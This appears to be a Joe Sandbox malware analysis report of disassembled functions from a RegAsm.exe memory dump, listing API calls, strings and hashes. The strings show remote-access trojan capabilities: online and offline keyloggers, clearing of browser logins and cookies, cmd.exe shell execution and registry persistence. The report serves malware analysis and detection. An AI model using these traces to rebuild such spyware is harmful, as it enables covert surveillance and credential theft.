                                                                                                                              • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
                                                                                                                              • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587
                                                                                                                              • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                                                                                                            • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                            • String ID: /sort "Visit Time" /stext "$0NG
                                                                                                                            • API String ID: 368326130-3219657780
                                                                                                                            • Opcode ID: c9b61a8cdb4904f4c311616bb4d487d7e842298a66d34b7121f4961234e342f8
                                                                                                                            • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                                                                                                                            • Opcode Fuzzy Hash: c9b61a8cdb4904f4c311616bb4d487d7e842298a66d34b7121f4961234e342f8
                                                                                                                            • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                                                                                                                            APIs
                                                                                                                            • _wcslen.LIBCMT ref: 004162F5
                                                                                                                              • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                                                                                              • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                                                                                                                              • Part of subcall function 00413877: RegCloseKey.KERNEL32(004660A4), ref: 004138AB
                                                                                                                              • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcslen$CloseCreateValue
                                                                                                                            • String ID: !D@$okmode$PG
                                                                                                                            • API String ID: 3411444782-3370592832
                                                                                                                            • Opcode ID: 33627434b7f82304c1ded9d3bb7774abf103e710ec097a6938a3706c33e36768
                                                                                                                            • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                                                                                                                            • Opcode Fuzzy Hash: 33627434b7f82304c1ded9d3bb7774abf103e710ec097a6938a3706c33e36768
                                                                                                                            • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,0040A267,?,00000000,00000000), ref: 0040A20E
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,0040A289,?,00000000,00000000), ref: 0040A21A
                                                                                                                              • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                                                                                                                              • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateThread$LocalTimewsprintf
                                                                                                                            • String ID: Offline Keylogger Started
                                                                                                                            • API String ID: 465354869-4114347211
                                                                                                                            • Opcode ID: 6722521d9a354589ddfd9572c5f22cfa7bfd03d06c3fb38996f6b2f9df3dd413
                                                                                                                            • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                                                                                                                            • Opcode Fuzzy Hash: 6722521d9a354589ddfd9572c5f22cfa7bfd03d06c3fb38996f6b2f9df3dd413
                                                                                                                            • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                                                                                                                              • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                                                                                              • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AF6E
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AF7A
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateThread$LocalTime$wsprintf
                                                                                                                            • String ID: Online Keylogger Started
                                                                                                                            • API String ID: 112202259-1258561607
                                                                                                                            • Opcode ID: 9998e3ed5b0b0a24696408f27a990a726a89a8e91e885a70493f5dfbd0b772b3
                                                                                                                            • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
                                                                                                                            • Opcode Fuzzy Hash: 9998e3ed5b0b0a24696408f27a990a726a89a8e91e885a70493f5dfbd0b772b3
                                                                                                                            • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
                                                                                                                            APIs
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                                                                            • SetEvent.KERNEL32(?), ref: 004051D9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseEventHandleObjectSingleWait
                                                                                                                            • String ID: Connection Timeout
                                                                                                                            • API String ID: 2055531096-499159329
                                                                                                                            • Opcode ID: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                                                                                                                            • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                                                                                                                            • Opcode Fuzzy Hash: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                                                                                                                            • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                                                                                                                            APIs
                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Exception@8Throw
                                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                            • API String ID: 2005118841-1866435925
                                                                                                                            • Opcode ID: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                                                                                                            • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                                                                                                                            • Opcode Fuzzy Hash: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                                                                                                            • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                                                                                                                            APIs
                                                                                                                            • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041381F
                                                                                                                            • RegSetValueExW.ADVAPI32 ref: 0041384D
                                                                                                                            • RegCloseKey.ADVAPI32(004752D8), ref: 00413858
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCreateValue
                                                                                                                            • String ID: pth_unenc
                                                                                                                            • API String ID: 1818849710-4028850238
                                                                                                                            • Opcode ID: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                                                                                                                            • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                                                                                                                            • Opcode Fuzzy Hash: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                                                                                                                            • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                                                                                                                            APIs
                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                                                                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                                                                                                                              • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                                                                                                                              • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                                            • String ID: bad locale name
                                                                                                                            • API String ID: 3628047217-1405518554
                                                                                                                            • Opcode ID: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                                                                                                            • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
                                                                                                                            • Opcode Fuzzy Hash: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                                                                                                            • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeHandleLibraryModule
                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                            • API String ID: 662261464-1276376045
                                                                                                                            • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                            • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                                                                            • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                            • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                                                                                                                            • ShowWindow.USER32(00000009), ref: 00416C61
                                                                                                                            • SetForegroundWindow.USER32 ref: 00416C6D
                                                                                                                              • Part of subcall function 0041CD9B: AllocConsole.KERNEL32 ref: 0041CDA4
                                                                                                                              • Part of subcall function 0041CD9B: GetConsoleWindow.KERNEL32 ref: 0041CDAA
                                                                                                                              • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                                                                                                              • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                                                                                                            • String ID: !D@
                                                                                                                            • API String ID: 186401046-604454484
                                                                                                                            • Opcode ID: 9f7fe5989ead697ba6d36c86eae2c50fc2179958361be672788b949ad241deb2
                                                                                                                            • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                                                                                                                            • Opcode Fuzzy Hash: 9f7fe5989ead697ba6d36c86eae2c50fc2179958361be672788b949ad241deb2
                                                                                                                            • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                                                                                                                            APIs
                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExecuteShell
                                                                                                                            • String ID: /C $cmd.exe$open
                                                                                                                            • API String ID: 587946157-3896048727
                                                                                                                            • Opcode ID: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                                                                                                                            • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                                                                                                                            • Opcode Fuzzy Hash: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                                                                                                                            • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                                                                                                                            APIs
                                                                                                                            • TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                                                                                                            • UnhookWindowsHookEx.USER32 ref: 0040B8C7
                                                                                                                            • TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: TerminateThread$HookUnhookWindows
                                                                                                                            • String ID: pth_unenc
                                                                                                                            • API String ID: 3123878439-4028850238
                                                                                                                            • Opcode ID: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                                                                                                            • Instruction ID: 1c21f009177841ea8acfe7f5b61a435624369701cc7e40c150536a334dec3301
                                                                                                                            • Opcode Fuzzy Hash: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                                                                                                            • Instruction Fuzzy Hash: 4AE01272205356EFD7241FA09C988267BEEDA0478A324487EF2C3626B1CA794C10CB5D
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                            • String ID: GetCursorInfo$User32.dll
                                                                                                                            • API String ID: 1646373207-2714051624
                                                                                                                            • Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                                                                                                            • Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
                                                                                                                            • Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                                                                                                            • Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                            • String ID: GetLastInputInfo$User32.dll
                                                                                                                            • API String ID: 2574300362-1519888992
                                                                                                                            • Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                                                                                                            • Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
                                                                                                                            • Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                                                                                                            • Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __alldvrm$_strrchr
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1036877536-0
                                                                                                                            • Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                                                                                                            • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                                                                                                                            • Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                                                                                                            • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                                                                                                            • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                                                                                                                            • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                                                                                                            • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                                                                            • __freea.LIBCMT ref: 100087D5
                                                                                                                              • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2652629310-0
                                                                                                                            • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                            • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                                                                            • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                            • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • Cleared browsers logins and cookies., xrefs: 0040C0F5
                                                                                                                            • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep
                                                                                                                            • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                                            • API String ID: 3472027048-1236744412
                                                                                                                            • Opcode ID: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
                                                                                                                            • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                                                                                                                            • Opcode Fuzzy Hash: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
                                                                                                                            • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                                                                                                                            APIs
                                                                                                                            • EnumDisplayMonitors.USER32(00000000,00000000,004195CF,00000000), ref: 004194F5
                                                                                                                            • EnumDisplayDevicesW.USER32(?), ref: 00419525
                                                                                                                            • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 0041959A
                                                                                                                            • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195B7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: DisplayEnum$Devices$Monitors
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1432082543-0
